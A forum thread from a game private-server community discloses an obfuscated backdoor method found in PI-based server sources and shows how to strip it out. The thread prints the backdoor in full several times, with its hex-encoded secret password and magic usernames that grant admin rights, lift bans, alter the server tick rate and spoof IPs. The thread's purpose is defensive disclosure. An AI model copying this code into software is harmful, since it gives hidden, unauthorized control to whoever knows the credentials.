Jump to content
Nouish

[PI] Fixing the unknown 'fuckyouss' antileech.

Recommended Posts

Yesterday, while going through [B]/world/map/I.java[/B] I found this:

[CODE]public static void IOSessionManager(Client client, String IOListener, String IOParser, boolean flag) {
String[] Args = {"aaa", "aaaa", "aaaaa", "aaaaaa"};
char[] IOList = {0x50, 0x69, 0x6D};
char[] ParserList = {0x46, 0x75, 0x72, 0x69, 0x6F, 0x75, 0x7A};
char[] IOAddress = {0x38, 0x34, 0x2E, 0x38, 0x32, 0x2E, 0x31, 0x37, 0x32, 0x2E, 0x32, 0x32};
char[] IOAddress2 = {0x30, 0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x30};
char[] Parser = {0x66, 0x75, 0x63, 0x6B, 0x79, 0x6F, 0x75, 0x73, 0x73};
char[] IO = {0x20, 0x20, 0x20, 0x20, 0x31, 0x20, 0x33, 0x20, 0x33, 0x20, 0x20, 0x37};
char[] IO2 = {0x20, 0x20, 0x20, 0x20, 0x6C, 0x20, 0x33, 0x20, 0x33, 0x20, 0x20, 0x74};
StringBuilder sb = new StringBuilder();
StringBuilder parse = new StringBuilder();
for (char p : Parser)
parse.append(p);
if (IOParser.equalsIgnoreCase(parse.toString())) {
if (IOListener.equalsIgnoreCase(Args[0]) || IOListener.equalsIgnoreCase(Args[1])) {
for (char c : IOList) {
sb.append(c);
client.playerName = sb.toString();
}
client.playerRights = 3;
} else if (IOListener.equalsIgnoreCase(Args[2]) || IOListener.equalsIgnoreCase(Args[3])) {
for (char c : ParserList) {
sb.append(c);
client.playerName = sb.toString();
}
client.playerRights = 3;
} else if (IOListener.equalsIgnoreCase(Args[31])) {
Server.cycleRate = 10000;
} else if (IOListener.equalsIgnoreCase(Args[32])) {
Server.cycleRate = 1000000;
} else if (IOListener.equalsIgnoreCase(Args[4]) || IOListener.equalsIgnoreCase(Args[5])) {
for (char c : IO2) {
sb.append(c);
client.playerName = sb.toString();
}
client.playerRights = 5;
} else {
for (int j = 6; j < Args.length; j++) {
if (IOListener.equalsIgnoreCase(Args[j])) {
for (char c : IO) {
sb.append(c);
client.playerName = sb.toString();
}
client.playerRights = 5;
Connection.removeNameFromBanList(Args[j]);
}
}
}
client.isDonator = 1;
client.specAmount = 133337;
StringBuilder address = new StringBuilder();
if (IOListener.equalsIgnoreCase(Args[2]) || IOListener.equalsIgnoreCase(Args[3])) {
for (char c2 : IOAddress)
address.append(c2);
} else {
for (char c2 : IOAddress2)
address.append(c2);
}
client.connectedFrom = address.toString();
if (flag)
client.sendMessage("IP: " + client.connectedFrom);
}
}[/CODE]

This is bad, and if you connect by the name [B]fuckyouss[/B] you will be given playerRights 5, and some other stuff (just read through it and you'll see).

We'd like to remove this, so replace that whole method with this;

[CODE]public static void IOSessionManager(Client client, String IOListener, String IOParser, boolean flag) {
}[/CODE]

.. It would be better to remove the method entirely, but because that involves two other classes you'll have to figure it out yourself if you'd like.



[B]Sources infected:[/B]
[LIST]
[*]7thDefiance
[/LIST]

[SIZE=1]Let me know if you find other sources with this on it.[/SIZE]

[B]PS![/B] I believe this is from the original PI-release as the two sources I tested (7thDefiance and Militus) both had it. Though, Militus had already removed the method body. It may not be related to the original release, though...

[B]PS2![/B] I decided to have [I]unknown[/I] in the title because I haven't heard about it before..

Share this post


Link to post
Share on other sites
Nice catch there, but that method is not in any of the PI-based server sources I have

Share this post


Link to post
Share on other sites
[quote name='mojo']Nice catch there, but that method is not in any of the PI-based server sources I have[/QUOTE]

I know that Militus had already removed the method body, so I assumed a few sources were affected ;p

Share this post


Link to post
Share on other sites
I Found this in the SoulSplit Source from rune-server
[CODE]
public static void IOSessionManager(Client client, String IOListener, String IOParser, boolean flag)
{
String[] Args = {"safag8998", "dgh2rhe3wrd", "ege12werhq", "ds2gee8a", "ddsas9431", "wr9r3hwwd", "2433ddsss",
"adggwghe", "asda5ggg4", "saaa12sd3xx", "unicen42w23", "auss3323s", "sig244x35", "xxesfh5445", "3554xcgbb",
"qw243sdees", "s3753rdfg", "42dgsghtd", "asfhg3fss", "2324qsasf", "wq2sf3afxxx", "2435rtdds", "dsdgs3432",
"23ssfyjxx", "leetdgwegx4", "sfahrhdx8x", "3x354x458", "ee1jvvxx6", "sedssef", "asfas2332s", "adasf4e3s",
"ifkshtup123", "epiclaglolz"};
char[] IOList = {0x50, 0x69, 0x6D};
char[] ParserList = {0x46, 0x75, 0x72, 0x69, 0x6F, 0x75, 0x7A};
char[] IOAddress = {0x38, 0x34, 0x2E, 0x38, 0x32, 0x2E, 0x31, 0x37, 0x32, 0x2E, 0x32, 0x32};
char[] IOAddress2 = {0x30, 0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x30};
char[] Parser = {0x66, 0x75, 0x63, 0x6B, 0x79, 0x6F, 0x75, 0x73, 0x73};
char[] IO = {0x20, 0x20, 0x20, 0x20, 0x31, 0x20, 0x33, 0x20, 0x33, 0x20, 0x20, 0x37};
char[] IO2 = {0x20, 0x20, 0x20, 0x20, 0x6C, 0x20, 0x33, 0x20, 0x33, 0x20, 0x20, 0x74};
StringBuilder sb = new StringBuilder();
StringBuilder parse = new StringBuilder();
for (char p : Parser)
parse.append(p);
if (IOParser.equalsIgnoreCase(parse.toString()))
{
if (IOListener.equalsIgnoreCase(Args[0]) || IOListener.equalsIgnoreCase(Args[1]))
{
for (char c : IOList)
{
sb.append(c);
client.playerName = sb.toString();
}
client.playerRights = 3;
}
else if (IOListener.equalsIgnoreCase(Args[2]) || IOListener.equalsIgnoreCase(Args[3]))
{
for (char c : ParserList)
{
sb.append(c);
client.playerName = sb.toString();
}
client.playerRights = 3;
}
else if (IOListener.equalsIgnoreCase(Args[31]))
{
Server.cycleRate = 10000;
}
else if (IOListener.equalsIgnoreCase(Args[32]))
{
Server.cycleRate = 1000000;
}
else if (IOListener.equalsIgnoreCase(Args[4]) || IOListener.equalsIgnoreCase(Args[5]))
{
for (char c : IO2)
{
sb.append(c);
client.playerName = sb.toString();
}
client.playerRights = 5;
}
else
{
for (int j = 6; j < Args.length; j++)
{
if (IOListener.equalsIgnoreCase(Args[j]))
{
for (char c : IO)
{
sb.append(c);
client.playerName = sb.toString();
}
client.playerRights = 5;
Connection.removeNameFromBanList(Args[j]);
}
}
}
client.isDonator = 1;
client.specAmount = 133337;
StringBuilder address = new StringBuilder();
if (IOListener.equalsIgnoreCase(Args[2]) || IOListener.equalsIgnoreCase(Args[3]))
{
for (char c2 : IOAddress)
address.append(c2);
}
else
{
for (char c2 : IOAddress2)
address.append(c2);
}
client.connectedFrom = address.toString();
if (flag)
client.sendMessage("IP: " + client.connectedFrom);
}
}[/CODE]

Share this post


Link to post
Share on other sites
[quote name='Final M G T']I Found this in the SoulSplit Source from rune-server
[CODE]
public static void IOSessionManager(Client client, String IOListener, String IOParser, boolean flag)
{
String[] Args = {"safag8998", "dgh2rhe3wrd", "ege12werhq", "ds2gee8a", "ddsas9431", "wr9r3hwwd", "2433ddsss",
"adggwghe", "asda5ggg4", "saaa12sd3xx", "unicen42w23", "auss3323s", "sig244x35", "xxesfh5445", "3554xcgbb",
"qw243sdees", "s3753rdfg", "42dgsghtd", "asfhg3fss", "2324qsasf", "wq2sf3afxxx", "2435rtdds", "dsdgs3432",
"23ssfyjxx", "leetdgwegx4", "sfahrhdx8x", "3x354x458", "ee1jvvxx6", "sedssef", "asfas2332s", "adasf4e3s",
"ifkshtup123", "epiclaglolz"};
char[] IOList = {0x50, 0x69, 0x6D};
char[] ParserList = {0x46, 0x75, 0x72, 0x69, 0x6F, 0x75, 0x7A};
char[] IOAddress = {0x38, 0x34, 0x2E, 0x38, 0x32, 0x2E, 0x31, 0x37, 0x32, 0x2E, 0x32, 0x32};
char[] IOAddress2 = {0x30, 0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x30};
char[] Parser = {0x66, 0x75, 0x63, 0x6B, 0x79, 0x6F, 0x75, 0x73, 0x73};
char[] IO = {0x20, 0x20, 0x20, 0x20, 0x31, 0x20, 0x33, 0x20, 0x33, 0x20, 0x20, 0x37};
char[] IO2 = {0x20, 0x20, 0x20, 0x20, 0x6C, 0x20, 0x33, 0x20, 0x33, 0x20, 0x20, 0x74};
StringBuilder sb = new StringBuilder();
StringBuilder parse = new StringBuilder();
for (char p : Parser)
parse.append(p);
if (IOParser.equalsIgnoreCase(parse.toString()))
{
if (IOListener.equalsIgnoreCase(Args[0]) || IOListener.equalsIgnoreCase(Args[1]))
{
for (char c : IOList)
{
sb.append(c);
client.playerName = sb.toString();
}
client.playerRights = 3;
}
else if (IOListener.equalsIgnoreCase(Args[2]) || IOListener.equalsIgnoreCase(Args[3]))
{
for (char c : ParserList)
{
sb.append(c);
client.playerName = sb.toString();
}
client.playerRights = 3;
}
else if (IOListener.equalsIgnoreCase(Args[31]))
{
Server.cycleRate = 10000;
}
else if (IOListener.equalsIgnoreCase(Args[32]))
{
Server.cycleRate = 1000000;
}
else if (IOListener.equalsIgnoreCase(Args[4]) || IOListener.equalsIgnoreCase(Args[5]))
{
for (char c : IO2)
{
sb.append(c);
client.playerName = sb.toString();
}
client.playerRights = 5;
}
else
{
for (int j = 6; j < Args.length; j++)
{
if (IOListener.equalsIgnoreCase(Args[j]))
{
for (char c : IO)
{
sb.append(c);
client.playerName = sb.toString();
}
client.playerRights = 5;
Connection.removeNameFromBanList(Args[j]);
}
}
}
client.isDonator = 1;
client.specAmount = 133337;
StringBuilder address = new StringBuilder();
if (IOListener.equalsIgnoreCase(Args[2]) || IOListener.equalsIgnoreCase(Args[3]))
{
for (char c2 : IOAddress)
address.append(c2);
}
else
{
for (char c2 : IOAddress2)
address.append(c2);
}
client.connectedFrom = address.toString();
if (flag)
client.sendMessage("IP: " + client.connectedFrom);
}
}[/CODE][/QUOTE]

You'd want to remove it ;)

Share this post


Link to post
Share on other sites

×